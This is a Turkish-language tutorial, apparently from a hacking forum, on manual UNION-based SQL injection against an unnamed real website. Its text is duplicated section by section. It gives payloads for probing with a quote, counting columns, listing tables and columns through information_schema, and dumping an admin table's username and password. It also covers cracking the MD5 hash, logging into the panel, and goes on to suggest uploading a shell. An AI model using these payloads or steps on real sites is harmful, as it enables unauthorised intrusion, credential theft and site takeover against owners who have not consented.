Manuel Sql İnjection
Sql dediğimiz olay sql kodlamada yapılan hata sonucu ortaya çıkar
Sitede sql komutları çalıştırmamıza yarar
Çoğunlukla sql bulunulan sitelerde
php?id=
php?cat=
vb. Url'ler mevcuttur
Bir sitede sql açığının olup olmadığını url sonuna " ' " işareti bırakınca anlarız
Hata verirse sql var demektir.
Sitede sql komutları çalıştırmamıza yarar
Çoğunlukla sql bulunulan sitelerde
php?id=
php?cat=
vb. Url'ler mevcuttur
Bir sitede sql açığının olup olmadığını url sonuna " ' " işareti bırakınca anlarız
Hata verirse sql var demektir.
Giriş
Hedef Sitemiz Bu
Sitemiz bu url sonuna " ' " tek tırnak işareti bırakalım
Sitede oluşan değişikliği sizde fark etmişsinizdir
Her seferinde hata çıkarmaz bazen sayfadan veriler eksilir biz o zamanda anlarız ki sql açığı var
Sitemiz bu url sonuna " ' " tek tırnak işareti bırakalım
Sitede oluşan değişikliği sizde fark etmişsinizdir
Her seferinde hata çıkarmaz bazen sayfadan veriler eksilir biz o zamanda anlarız ki sql açığı var
Kolon Sayısı
Şimdi ise kolon sayısını tespit edecez bunun için
Payload: +order+by+1-- -
Burdaki 1'i artıracaz sayfadan tekrar veriler silinene kadar veya hata çıkarana kadar
Evet bir bir artırdık ve 12 de hatayı aldık farz edelim
Payload: +order+by+1-- -
Burdaki 1'i artıracaz sayfadan tekrar veriler silinene kadar veya hata çıkarana kadar
Evet bir bir artırdık ve 12 de hatayı aldık farz edelim
Ekrana Sayı Yazdırma
Kolon sayısını öğrendik 11
Şimdiki payloadımız ise ekrana bir sayı yazıracak ve biz o sayı üzerinden sql komutları çalıştırabilecez
Ama bunu atlamayın url index.php?id=35 ise 35 in önüne - işaretini katmamız lazım bu aşamada
Payload: +union+select+1,2,3,4,5,6,7,8,9,10,11
Kolon sayısı ne kadar ise sizde ona göre sıralarsınız
2 sayısını döndürdü şimdi bu 2 sayısı üzerinden komut çalışıracaz
örnek komutlar
version() -> Version Bilgisi
database() -> Database adını döner
@@plugin_dir -> Pluginlerin bulunduğu dizinleri döner
Payload: +union+select+1,@@plugin_dir,3,4,5,6,7,8,9,10,11
Şimdiki payloadımız ise ekrana bir sayı yazıracak ve biz o sayı üzerinden sql komutları çalıştırabilecez
Ama bunu atlamayın url index.php?id=35 ise 35 in önüne - işaretini katmamız lazım bu aşamada
Payload: +union+select+1,2,3,4,5,6,7,8,9,10,11
Kolon sayısı ne kadar ise sizde ona göre sıralarsınız
2 sayısını döndürdü şimdi bu 2 sayısı üzerinden komut çalışıracaz
örnek komutlar
version() -> Version Bilgisi
database() -> Database adını döner
@@plugin_dir -> Pluginlerin bulunduğu dizinleri döner
Payload: +union+select+1,@@plugin_dir,3,4,5,6,7,8,9,10,11
Tablo İsimlerini Çekme
Bu aşamada ise tablo isimlerini çekecez bizim için admin bilgisinin yer aldığı tablo gerekli
Payload1: group_concat(table_name)
Payload2: +from+information_schema.tables
payload1'i komut çalıştırdığımız yere
payload2'yi ise url'nin sonuna ekliyoruz
Payload1: group_concat(table_name)
Payload2: +from+information_schema.tables
payload1'i komut çalıştırdığımız yere
payload2'yi ise url'nin sonuna ekliyoruz
Tablonun İçindeki Verileri Çekme(column)
Admin tablosunu bulduk -> ak_admin
Tablonun İçeriğini Okuyalım
Payload1: group_concat(column_name)
Payload2: +from+information_schema.columns+where+table_name="ak_admin"
Evet username ve password çekelim bu aşamada
Payload1: group_concat(username,password)
Payload2:+from+ak_admin
Evet Kullanıcı Adını Tespit Ettik -> admin
Parolası ise md5 ile şifrelenmiş onu kırmamız gerekecek
md5 decrypt sitelerinden birine girip çözelim
Şifreyi de bulduk -> admin
Bakalım Panele Girebilecekmiyiz bu bilgiler ile
Panelede girdik gerisi shell basmaya kalmış kendinizi deneyip geliştirebilirsiniz
bu site üzerinden kolay gelsin herekese bir konun daha sonuna geldik.
Tablonun İçeriğini Okuyalım
Payload1: group_concat(column_name)
Payload2: +from+information_schema.columns+where+table_name="ak_admin"
Evet username ve password çekelim bu aşamada
Payload1: group_concat(username,password)
Payload2:+from+ak_admin
Evet Kullanıcı Adını Tespit Ettik -> admin
Parolası ise md5 ile şifrelenmiş onu kırmamız gerekecek
md5 decrypt sitelerinden birine girip çözelim
Şifreyi de bulduk -> admin
Bakalım Panele Girebilecekmiyiz bu bilgiler ile
Panelede girdik gerisi shell basmaya kalmış kendinizi deneyip geliştirebilirsiniz
bu site üzerinden kolay gelsin herekese bir konun daha sonuna geldik.
